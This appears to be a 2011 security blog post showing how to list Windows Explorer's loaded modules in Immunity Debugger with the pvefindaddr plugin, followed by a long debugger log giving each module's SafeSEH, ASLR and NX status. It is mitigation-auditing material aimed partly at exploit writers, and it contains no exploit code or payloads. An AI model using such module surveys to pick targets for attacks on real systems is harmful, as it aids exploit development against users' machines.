Thursday, January 20, 2011

checking aslr, safeseh and more

Couple days ago i notice a post from Didier Stevens on how to check aslr status for shell extensions ( http://blog.didierstevens.com/2011/01/18/quickpost-checking-aslr/ ). In his approach he is using an excellent tool, Process Explorer to list the modules. Another way of doing the same is using pvefindaddr and immunity debugger. Pvefindaddr is a great tool, http://redmine.corelan.be:8800/projects/pvefindaddr,  that exploit writers should be at least aware of.

A different approach to check the modules for aslr status can be done using the following.

Grab a copy of pvefindaddr and copy it on pycommands directory of the Immunity debugger. Load the debugger, using administrator privileges on windows 7 and from file File, Attach, choose explorer.exe. You will see something like:
On the debugger now again, execute the command !pvefindaddr modules wait for a couple of seconds and open the log window, the following screen will appear,
There you will see all the modules and their status, shell extensions are also listed there, for example in my list i have the following extensions:

Log data
Address    Message
           Immunity Debugger 1.80.0.1 : Yggdrasil
           Need support? visit http://forum.immunityinc.com/
           Error accesing memory
           File 'C:\Windows\explorer.exe'
           [10:17:09] New process with ID 00000F4C created
           Main thread with ID 000010F4 created
76E2EE2A   New thread with ID 00000AD8 created
76E2D662   New thread with ID 000008CC created
7528C89D   New thread with ID 000013B4 created
75F145E9   New thread with ID 00000C5C created
75DC12E5   New thread with ID 0000111C created
75F145E9   New thread with ID 0000145C created
76E2D662   New thread with ID 00001094 created
73A617A4   New thread with ID 00000A04 created
76E2D662   New thread with ID 0000157C created
76E2D662   New thread with ID 000012DC created
76E2D662   New thread with ID 00001098 created
75F145E9   New thread with ID 00000DD4 created
75F145E9   New thread with ID 00000898 created
75F145E9   New thread with ID 000016DC created
75F145E9   New thread with ID 0000138C created
75F145E9   New thread with ID 00000FD8 created
739E2F69   New thread with ID 00000878 created
75F145E9   New thread with ID 00001674 created
75F145E9   New thread with ID 0000124C created
7528C89D   New thread with ID 00000B70 created
6FA452C9   New thread with ID 0000130C created
76E2D662   New thread with ID 00000AF4 created
65BB268A   New thread with ID 00001470 created
7528C89D   New thread with ID 00000C44 created
76E2D662   New thread with ID 0000079C created
75F145E9   New thread with ID 0000090C created
76E2D662   New thread with ID 00001110 created
76E2D662   New thread with ID 00001728 created
76E9D315   New thread with ID 00000708 created
00B80000   Modules C:\Windows\explorer.exe
020A0000   Modules C:\Program Files\TortoiseSVN\bin\TortoiseSVN.dll
042D0000   Modules C:\Program Files\Notepad++\NppShell_01.dll
04320000   Modules C:\Program Files\7-Zip\7-zip.dll
043F0000   Modules C:\Windows\system32\thumbcache.dll
05940000   Modules C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll
05960000   Modules C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
10000000   Modules C:\Program Files\TortoiseSVN\bin\intl3_tsvn.dll
62890000   Modules C:\Windows\System32\SyncCenter.dll
65870000   Modules C:\Windows\System32\werconcpl.dll
65980000   Modules C:\Windows\system32\FXSRESM.DLL
65BB0000   Modules C:\Windows\system32\fxsst.dll
65D40000   Modules C:\Windows\System32\pnidui.dll
66EA0000   Modules c:\PROGRA~1\MIF707~1\shellext.dll
68BD0000   Modules C:\Windows\System32\ieframe.dll
69A80000   Modules C:\Windows\System32\bthprops.cpl
6AC60000   Modules C:\Windows\System32\Actioncenter.dll
6AD20000   Modules C:\Windows\System32\wscui.cpl
6AE40000   Modules C:\Windows\system32\ntshrui.dll
6AF20000   Modules C:\Windows\system32\msi.dll
6B4B0000   Modules C:\Windows\system32\imapi2.dll
6B550000   Modules C:\Windows\system32\NetworkExplorer.dll
6BAD0000   Modules C:\Windows\system32\PortableDeviceApi.dll
6BF10000   Modules C:\Windows\System32\WSCAPI.dll
6BF40000   Modules C:\Windows\system32\FXSAPI.dll
6BF80000   Modules C:\Windows\System32\provsvc.dll
6C050000   Modules C:\Windows\System32\wer.dll
6C0B0000   Modules C:\Windows\System32\gameux.dll
6C350000   Modules C:\Windows\System32\shdocvw.dll
6C380000   Modules C:\Windows\system32\actxprxy.dll
6C3E0000   Modules C:\Windows\System32\cscui.dll
6C450000   Modules C:\PROGRA~1\MICROS~3\Office14\1033\GrooveIntlResource.dll
             Invalid or compressed Image Export Directory
6CCC0000   Modules C:\PROGRA~1\MICROS~3\Office14\GROOVEEX.DLL
6D0D0000   Modules C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf
6D600000   Modules C:\Windows\WinSxS\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4974_none_51cdc180bbe4500f\ATL90.DLL
6D630000   Modules C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4974_none_50940634bcb759cb\MSVCR90.dll
6D7B0000   Modules C:\Windows\System32\UIAnimation.dll
6D7E0000   Modules C:\Windows\System32\hgcpl.dll
6D870000   Modules C:\Program Files\Internet Explorer\ieproxy.dll
6DB50000   Modules C:\Windows\system32\dxp.dll
6E240000   Modules C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4974_none_50940634bcb759cb\MSVCP90.dll
6E2F0000   Modules C:\Windows\System32\netprofm.dll
6E4B0000   Modules C:\Windows\system32\SHFOLDER.dll
6E540000   Modules C:\Windows\system32\WINSPOOL.DRV
6E6E0000   Modules C:\Windows\system32\EXPLORERFRAME.dll
6E970000   Modules C:\Windows\system32\PortableDeviceTypes.dll
6EAE0000   Modules C:\Windows\system32\msutb.dll
6ECB0000   Modules C:\Windows\system32\MPR.dll
6ECD0000   Modules C:\Windows\system32\LINKINFO.dll
6EE60000   Modules C:\Program Files\TortoiseSVN\bin\libaprutil_tsvn.dll
6EEC0000   Modules C:\Program Files\TortoiseSVN\bin\libapr_tsvn.dll
6F050000   Modules C:\Windows\system32\EhStorShell.dll
6F670000   Modules C:\Windows\system32\cscapi.dll
6FA40000   Modules C:\Windows\system32\Wlanapi.dll
70FA0000   Modules C:\Windows\system32\wlanutil.dll
71020000   Modules C:\Windows\system32\dhcpcsvc.DLL
713F0000   Modules C:\Windows\System32\WINNSI.DLL
71400000   Modules C:\Windows\System32\IPHLPAPI.DLL
71970000   Modules C:\Windows\system32\MsftEdit.dll
71A30000   Modules C:\Windows\system32\mssprxy.dll
71AA0000   Modules C:\Windows\system32\wwanapi.dll
71CD0000   Modules C:\Windows\system32\prnfldr.dll
71D40000   Modules C:\Windows\system32\BatMeter.dll
71E00000   Modules C:\Windows\System32\npmproxy.dll
71E20000   Modules C:\Windows\System32\QAgent.dll
71EA0000   Modules C:\Windows\system32\SYNCENG.dll
71EC0000   Modules C:\Windows\system32\syncui.dll
71F40000   Modules C:\Windows\System32\srchadmin.dll
71F90000   Modules C:\Program Files\WinRAR\rarext.dll
71FC0000   Modules C:\Windows\system32\twext.dll
71FF0000   Modules C:\Windows\System32\wercplsupport.dll
72010000   Modules C:\Windows\System32\framedynos.dll
721B0000   Modules C:\Windows\System32\cscobj.dll
72380000   Modules C:\Windows\System32\QUtil.dll
723A0000   Modules C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
72400000   Modules C:\Windows\system32\timedate.cpl
72480000   Modules C:\Windows\system32\EhStorAPI.dll
724B0000   Modules C:\Windows\system32\stobject.dll
72510000   Modules C:\Windows\System32\netshell.dll
72D90000   Modules C:\Windows\system32\dhcpcsvc6.DLL
72DD0000   Modules C:\Windows\System32\msxml6.dll
72F50000   Modules C:\Windows\system32\es.dll
72FA0000   Modules C:\Windows\system32\slc.dll
72FC0000   Modules C:\Windows\system32\ATL.DLL
730F0000   Modules C:\Windows\system32\taskschd.dll
731B0000   Modules C:\Windows\system32\POWRPROF.dll
73270000   Modules C:\Windows\System32\nlaapi.dll
734B0000   Modules C:\Windows\system32\ntmarta.dll
734F0000   Modules C:\Windows\system32\wwapi.dll
73500000   Modules C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
73510000   Modules C:\Windows\System32\wscinterop.dll
73530000   Modules C:\Windows\system32\SndVolSSO.DLL
73570000   Modules C:\Windows\System32\OLEACC.dll
73640000   Modules C:\Windows\System32\CSCDLL.dll
73650000   Modules C:\Windows\system32\wpdshserviceobj.dll
73690000   Modules C:\Windows\system32\AUDIOSES.DLL
736D0000   Modules C:\Windows\system32\msls31.dll
73700000   Modules C:\Windows\System32\AltTab.dll
73710000   Modules C:\Windows\ehome\ehSSO.dll
73720000   Modules C:\Windows\System32\shacct.dll
73750000   Modules C:\Windows\system32\wkscli.dll
73760000   Modules C:\Windows\system32\netutils.dll
73890000   Modules C:\Windows\system32\WindowsCodecs.dll
73990000   Modules C:\Windows\System32\XmlLite.dll
739C0000   Modules C:\Windows\system32\dwmapi.dll
739E0000   Modules C:\Windows\System32\MMDevApi.dll
73A20000   Modules C:\Windows\system32\HID.DLL
73A50000   Modules C:\Windows\System32\hcproviders.dll
73A60000   Modules C:\Windows\system32\msiltcfg.dll
73A70000   Modules C:\Windows\system32\DUser.dll
73AA0000   Modules C:\Windows\system32\DUI70.dll
73B60000   Modules C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
73CF0000   Modules C:\Windows\system32\UxTheme.dll
73D30000   Modules C:\Windows\system32\PROPSYS.dll
73E30000   Modules C:\Windows\system32\SAMLIB.dll
73E50000   Modules C:\Windows\system32\Syncreg.dll
73E60000   Modules C:\Windows\system32\IconCodecService.dll
73E70000   Modules C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\comctl32.dll
74010000   Modules C:\Windows\system32\CRYPTUI.dll
74110000   Modules C:\Windows\system32\authui.dll
74340000   Modules C:\Windows\system32\WTSAPI32.dll
74410000   Modules C:\Windows\system32\VERSION.dll
74570000   Modules C:\Windows\system32\USERENV.dll
74750000   Modules C:\Windows\system32\DEVRTL.dll
74770000   Modules C:\Windows\system32\rsaenh.dll
74850000   Modules C:\Windows\system32\dnsapi.DLL
74990000   Modules C:\Windows\system32\MSWSOCK.dll
749D0000   Modules C:\Windows\system32\CRYPTSP.dll
74B90000   Modules C:\Windows\System32\wevtapi.dll
74DA0000   Modules C:\Windows\system32\srvcli.dll
74E10000   Modules C:\Windows\system32\Secur32.dll
74E30000   Modules C:\Windows\system32\SSPICLI.DLL
74E50000   Modules C:\Windows\system32\apphelp.dll
74EA0000   Modules C:\Windows\system32\CRYPTBASE.dll
74EB0000   Modules C:\Windows\system32\SXS.DLL
74F10000   Modules C:\Windows\System32\WINSTA.dll
74F40000   Modules C:\Windows\system32\RpcRtRemote.dll
74F50000   Modules C:\Windows\system32\profapi.dll
             Invalid or compressed Image Export Directory
74FC0000   Modules C:\Windows\system32\MSASN1.dll
75060000   Modules C:\Windows\system32\CRYPT32.dll
75180000   Modules C:\Windows\system32\WINTRUST.dll
751B0000   Modules C:\Windows\system32\CFGMGR32.dll
751E0000   Modules C:\Windows\system32\KERNELBASE.dll
75230000   Modules C:\Windows\system32\DEVOBJ.dll
75250000   Modules C:\Windows\system32\NSI.dll
75260000   Modules C:\Windows\system32\ole32.dll
753C0000   Modules C:\Windows\system32\GDI32.dll
75470000   Modules C:\Windows\system32\WININET.dll
75570000   Modules C:\Windows\system32\RPCRT4.dll
75620000   Modules C:\Windows\system32\kernel32.dll
75700000   Modules C:\Windows\system32\OLEAUT32.dll
75790000   Modules C:\Windows\system32\urlmon.dll
758D0000   Modules C:\Windows\system32\PSAPI.DLL
758E0000   Modules C:\Windows\system32\USER32.dll
759B0000   Modules C:\Windows\system32\WS2_32.dll
759F0000   Modules C:\Windows\system32\MSCTF.dll
75AC0000   Modules C:\Windows\system32\IMM32.dll
75AE0000   Modules C:\Windows\SYSTEM32\sechost.dll
75B80000   Modules C:\Windows\system32\SETUPAPI.dll
75D20000   Modules C:\Windows\system32\CLBCatQ.DLL
75DB0000   Modules C:\Windows\system32\msvcrt.dll
75E60000   Modules C:\Windows\system32\USP10.dll
75F00000   Modules C:\Windows\system32\SHLWAPI.dll
75F60000   Modules C:\Windows\system32\SHELL32.dll
76BB0000   Modules C:\Windows\system32\WLDAP32.dll
76C00000   Modules C:\Windows\system32\iertutil.dll
76E00000   Modules C:\Windows\SYSTEM32\ntdll.dll
76F40000   Modules C:\Windows\system32\LPK.dll
76F50000   Modules C:\Windows\system32\Normaliz.dll
76F60000   Modules C:\Windows\system32\ADVAPI32.dll
76E33574   [10:17:20] Attached process paused at ntdll.DbgBreakPoint
0BADF00D
0BADF00D
0BADF00D
0BADF00D   ** [+] Gathering executable / loaded module info, please wait...
0BADF00D   ** [+] Finished task, 170 modules found
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Loaded modules
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D     Fixup  |   Base     |    Top     |    Size    | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D      yes   | 0x72010000 | 0x72045000 | 0x00035000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - framedynos.dll : C:\Windows\System32\framedynos.dll
0BADF00D      yes   | 0x74990000 | 0x749CC000 | 0x0003C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - MSWSOCK.dll : C:\Windows\system32\MSWSOCK.dll
0BADF00D      yes   | 0x72400000 | 0x72478000 | 0x00078000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - timedate.cpl : C:\Windows\system32\timedate.cpl
0BADF00D      yes   | 0x6ECD0000 | 0x6ECD9000 | 0x00009000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - LINKINFO.dll : C:\Windows\system32\LINKINFO.dll
0BADF00D      yes   | 0x74FC0000 | 0x74FCC000 | 0x0000C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16415 - MSASN1.dll : C:\Windows\system32\MSASN1.dll
0BADF00D      yes   | 0x6E4B0000 | 0x6E4B5000 | 0x00005000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SHFOLDER.dll : C:\Windows\system32\SHFOLDER.dll
0BADF00D      yes   | 0x71970000 | 0x71A04000 | 0x00094000 |   yes   |  yes  |    yes   |   yes  | 5.41.21.2509 - MsftEdit.dll : C:\Windows\system32\MsftEdit.dll
0BADF00D      yes   | 0x736D0000 | 0x736FA000 | 0x0002A000 |   yes   |  yes  |    yes   |   yes  | 3.10.349.0 - msls31.dll : C:\Windows\system32\msls31.dll
0BADF00D      yes   | 0x739C0000 | 0x739D3000 | 0x00013000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - dwmapi.dll : C:\Windows\system32\dwmapi.dll
0BADF00D      yes   | 0x730F0000 | 0x7316B000 | 0x0007B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - taskschd.dll : C:\Windows\system32\taskschd.dll
0BADF00D      yes   | 0x6F050000 | 0x6F081000 | 0x00031000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - EhStorShell.dll : C:\Windows\system32\EhStorShell.dll
0BADF00D      yes   | 0x72FA0000 | 0x72FAA000 | 0x0000A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - slc.dll : C:\Windows\system32\slc.dll
0BADF00D      yes   | 0x71FC0000 | 0x71FE7000 | 0x00027000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - twext.dll : C:\Windows\system32\twext.dll
0BADF00D      yes   | 0x734F0000 | 0x734FA000 | 0x0000A000 |   yes   |  yes  |    yes   |   yes  | 08.01.02.00 - wwapi.dll : C:\Windows\system32\wwapi.dll
0BADF00D      yes   | 0x65870000 | 0x65976000 | 0x00106000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - werconcpl.dll : C:\Windows\System32\werconcpl.dll
0BADF00D      yes   | 0x73710000 | 0x73718000 | 0x00008000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - ehSSO.dll : C:\Windows\ehome\ehSSO.dll
0BADF00D      yes   | 0x73650000 | 0x7366D000 | 0x0001D000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wpdshserviceobj.dll : C:\Windows\system32\wpdshserviceobj.dll
0BADF00D      yes   | 0x76C00000 | 0x76DFA000 | 0x001FA000 |   yes   |  yes  |    yes   |   yes  | 8.00.7600.16700 - iertutil.dll : C:\Windows\system32\iertutil.dll
0BADF00D      yes   | 0x73D30000 | 0x73E25000 | 0x000F5000 |   yes   |  yes  |    yes   |   yes  | 7.00.7600.16385 - PROPSYS.dll : C:\Windows\system32\PROPSYS.dll
0BADF00D      yes   | 0x74B90000 | 0x74BD2000 | 0x00042000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wevtapi.dll : C:\Windows\System32\wevtapi.dll
0BADF00D      yes   | 0x724B0000 | 0x724E9000 | 0x00039000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - stobject.dll : C:\Windows\system32\stobject.dll
0BADF00D      yes   | 0x713F0000 | 0x713F7000 | 0x00007000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WINNSI.DLL : C:\Windows\System32\WINNSI.DLL
0BADF00D      yes   | 0x75260000 | 0x753BC000 | 0x0015C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - ole32.dll : C:\Windows\system32\ole32.dll
0BADF00D      yes   | 0x75F00000 | 0x75F57000 | 0x00057000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SHLWAPI.dll : C:\Windows\system32\SHLWAPI.dll
0BADF00D      yes   | 0x72F50000 | 0x72F97000 | 0x00047000 |   yes   |  yes  |    yes   |   yes  | 2001.12.8530.16385 - es.dll : C:\Windows\system32\es.dll
0BADF00D      yes   | 0x758E0000 | 0x759A9000 | 0x000C9000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - USER32.dll : C:\Windows\system32\USER32.dll
0BADF00D      yes   | 0x65BB0000 | 0x65C82000 | 0x000D2000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - fxsst.dll : C:\Windows\system32\fxsst.dll
0BADF00D      yes   | 0x6D7B0000 | 0x6D7CB000 | 0x0001B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - UIAnimation.dll : C:\Windows\System32\UIAnimation.dll
0BADF00D      yes   | 0x6ECB0000 | 0x6ECC2000 | 0x00012000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - MPR.dll : C:\Windows\system32\MPR.dll
0BADF00D      yes   | 0x74010000 | 0x74108000 | 0x000F8000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - CRYPTUI.dll : C:\Windows\system32\CRYPTUI.dll
0BADF00D      yes   | 0x75180000 | 0x751AD000 | 0x0002D000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16493 - WINTRUST.dll : C:\Windows\system32\WINTRUST.dll
0BADF00D      yes   | 0x73890000 | 0x7398B000 | 0x000FB000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WindowsCodecs.dll : C:\Windows\system32\WindowsCodecs.dll
0BADF00D      yes   | 0x73720000 | 0x7373E000 | 0x0001E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - shacct.dll : C:\Windows\System32\shacct.dll
0BADF00D      yes   | 0x73570000 | 0x735AC000 | 0x0003C000 |   yes   |  yes  |    yes   |   yes  | 7.0.0.0 - OLEACC.dll : C:\Windows\System32\OLEACC.dll
0BADF00D      yes   | 0x75F60000 | 0x76BA9000 | 0x00C49000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SHELL32.dll : C:\Windows\system32\SHELL32.dll
0BADF00D      yes   | 0x73510000 | 0x7352A000 | 0x0001A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wscinterop.dll : C:\Windows\System32\wscinterop.dll
0BADF00D      yes   | 0x73640000 | 0x73649000 | 0x00009000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - CSCDLL.dll : C:\Windows\System32\CSCDLL.dll
0BADF00D      yes   | 0x75D20000 | 0x75DA3000 | 0x00083000 |   yes   |  yes  |    yes   |   yes  | 2001.12.8530.16385 - CLBCatQ.DLL : C:\Windows\system32\CLBCatQ.DLL
0BADF00D      yes   | 0x73A20000 | 0x73A29000 | 0x00009000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - HID.DLL : C:\Windows\system32\HID.DLL
0BADF00D      yes   | 0x739E0000 | 0x73A19000 | 0x00039000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - MMDevApi.dll : C:\Windows\System32\MMDevApi.dll
0BADF00D      yes   | 0x71E20000 | 0x71E4E000 | 0x0002E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - QAgent.dll : C:\Windows\System32\QAgent.dll
0BADF00D      yes   | 0x65980000 | 0x65A63000 | 0x000E3000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - FXSRESM.DLL : C:\Windows\system32\FXSRESM.DLL
0BADF00D      yes   | 0x751B0000 | 0x751D7000 | 0x00027000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - CFGMGR32.dll : C:\Windows\system32\CFGMGR32.dll
0BADF00D      yes   | 0x74850000 | 0x74894000 | 0x00044000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - dnsapi.DLL : C:\Windows\system32\dnsapi.DLL
0BADF00D      yes   | 0x6B4B0000 | 0x6B514000 | 0x00064000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - imapi2.dll : C:\Windows\system32\imapi2.dll
0BADF00D      yes   | 0x71EA0000 | 0x71EB6000 | 0x00016000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SYNCENG.dll : C:\Windows\system32\SYNCENG.dll
0BADF00D      yes   | 0x6C050000 | 0x6C0B0000 | 0x00060000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wer.dll : C:\Windows\System32\wer.dll
0BADF00D      yes   | 0x74E30000 | 0x74E4A000 | 0x0001A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SSPICLI.DLL : C:\Windows\system32\SSPICLI.DLL
0BADF00D      yes   | 0x731B0000 | 0x731D5000 | 0x00025000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - POWRPROF.dll : C:\Windows\system32\POWRPROF.dll
0BADF00D      yes   | 0x6D870000 | 0x6D89B000 | 0x0002B000 |   yes   |  yes  |    yes   |   NO   | 8.00.7600.16700 - ieproxy.dll : C:\Program Files\Internet Explorer\ieproxy.dll
0BADF00D      yes   | 0x6BF10000 | 0x6BF1F000 | 0x0000F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WSCAPI.dll : C:\Windows\System32\WSCAPI.dll
0BADF00D      yes   | 0x75790000 | 0x758C5000 | 0x00135000 |   yes   |  yes  |    yes   |   yes  | 8.00.7600.16385 - urlmon.dll : C:\Windows\system32\urlmon.dll
0BADF00D      NO    | 0x05940000 | 0x0594E000 | 0x0000E000 |   yes   |  NO   |    NO    |   NO   | 1.6.11.20210 - TortoiseStub.dll : C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll
0BADF00D      yes   | 0x74F10000 | 0x74F39000 | 0x00029000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WINSTA.dll : C:\Windows\System32\WINSTA.dll
0BADF00D      yes   | 0x6D0D0000 | 0x6D4DF000 | 0x0040F000 |   yes   |  yes  |    NO    |   NO   | 14.0.4738.1000 - office.odf : C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf
0BADF00D      yes   | 0x6DB50000 | 0x6DBB4000 | 0x00064000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - dxp.dll : C:\Windows\system32\dxp.dll
0BADF00D      yes   | 0x75620000 | 0x756F4000 | 0x000D4000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - kernel32.dll : C:\Windows\system32\kernel32.dll
0BADF00D      yes   | 0x74EA0000 | 0x74EAC000 | 0x0000C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - CRYPTBASE.dll : C:\Windows\system32\CRYPTBASE.dll
0BADF00D      yes   | 0x76E00000 | 0x76F3C000 | 0x0013C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - ntdll.dll : C:\Windows\SYSTEM32\ntdll.dll
0BADF00D      yes   | 0x75AE0000 | 0x75AF9000 | 0x00019000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - sechost.dll : C:\Windows\SYSTEM32\sechost.dll
0BADF00D      yes   | 0x6D630000 | 0x6D6D3000 | 0x000A3000 |   yes   |  yes  |    yes   |   yes  | 9.00.30729.4974 - MSVCR90.dll : C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4974_none_50940634bcb759cb\MSVCR90.dll
0BADF00D      yes   | 0x6D600000 | 0x6D62B000 | 0x0002B000 |   yes   |  yes  |    yes   |   yes  | 9.00.30729.4974 - ATL90.DLL : C:\Windows\WinSxS\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4974_none_51cdc180bbe4500f\ATL90.DLL
0BADF00D      yes   | 0x6EAE0000 | 0x6EB0C000 | 0x0002C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - msutb.dll : C:\Windows\system32\msutb.dll
0BADF00D      yes   | 0x73A50000 | 0x73A59000 | 0x00009000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - hcproviders.dll : C:\Windows\System32\hcproviders.dll
0BADF00D      yes   | 0x73A60000 | 0x73A67000 | 0x00007000 |   yes   |  yes  |    yes   |   yes  | 5.0.7600.16385 - msiltcfg.dll : C:\Windows\system32\msiltcfg.dll
0BADF00D      yes   | 0x75470000 | 0x75564000 | 0x000F4000 |   yes   |  yes  |    yes   |   yes  | 8.00.7600.16385 - WININET.dll : C:\Windows\system32\WININET.dll
0BADF00D      yes   | 0x00B80000 | 0x00E01000 | 0x00281000 |   yes   |  yes  |    NO    |   yes  | 6.1.7600.16385 - explorer.exe : C:\Windows\explorer.exe
0BADF00D      NO    | 0x10000000 | 0x10012000 | 0x00012000 |   yes   |  NO   |    NO    |   NO   | 0.14.4 - intl3_tsvn.dll : C:\Program Files\TortoiseSVN\bin\intl3_tsvn.dll
0BADF00D      yes   | 0x62890000 | 0x62A9E000 | 0x0020E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SyncCenter.dll : C:\Windows\System32\SyncCenter.dll
0BADF00D      yes   | 0x6C350000 | 0x6C37E000 | 0x0002E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - shdocvw.dll : C:\Windows\System32\shdocvw.dll
0BADF00D      yes   | 0x758D0000 | 0x758D5000 | 0x00005000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - PSAPI.DLL : C:\Windows\system32\PSAPI.DLL
0BADF00D      yes   | 0x75AC0000 | 0x75ADF000 | 0x0001F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - IMM32.dll : C:\Windows\system32\IMM32.dll
0BADF00D      yes   | 0x73500000 | 0x7350D000 | 0x0000D000 |   yes   |  yes  |    NO    |   NO   | 14.0.4750.1000 - MSOXMLMF.DLL : C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
0BADF00D      yes   | 0x6F670000 | 0x6F67B000 | 0x0000B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - cscapi.dll : C:\Windows\system32\cscapi.dll
0BADF00D      yes   | 0x73CF0000 | 0x73D30000 | 0x00040000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - UxTheme.dll : C:\Windows\system32\UxTheme.dll
0BADF00D      yes   | 0x71400000 | 0x7141C000 | 0x0001C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - IPHLPAPI.DLL : C:\Windows\System32\IPHLPAPI.DLL
0BADF00D      yes   | 0x71D40000 | 0x71DF7000 | 0x000B7000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - BatMeter.dll : C:\Windows\system32\BatMeter.dll
0BADF00D      yes   | 0x76F40000 | 0x76F4A000 | 0x0000A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - LPK.dll : C:\Windows\system32\LPK.dll
0BADF00D      yes   | 0x6E970000 | 0x6E99B000 | 0x0002B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - PortableDeviceTypes.dll : C:\Windows\system32\PortableDeviceTypes.dll
0BADF00D      NO    | 0x05960000 | 0x05978000 | 0x00018000 |   yes   |  NO   |    NO    |   NO   | 1.1.1.19039 - TortoiseOverlays.dll : C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
0BADF00D      yes   | 0x74F50000 | 0x74F5B000 | 0x0000B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - profapi.dll : C:\Windows\system32\profapi.dll
0BADF00D      yes   | 0x71020000 | 0x71032000 | 0x00012000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - dhcpcsvc.DLL : C:\Windows\system32\dhcpcsvc.DLL
0BADF00D      yes   | 0x043F0000 | 0x04406000 | 0x00016000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - thumbcache.dll : C:\Windows\system32\thumbcache.dll
0BADF00D      yes   | 0x73E70000 | 0x7400E000 | 0x0019E000 |   yes   |  yes  |    yes   |   yes  | 6.10 - comctl32.dll : C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\comctl32.dll
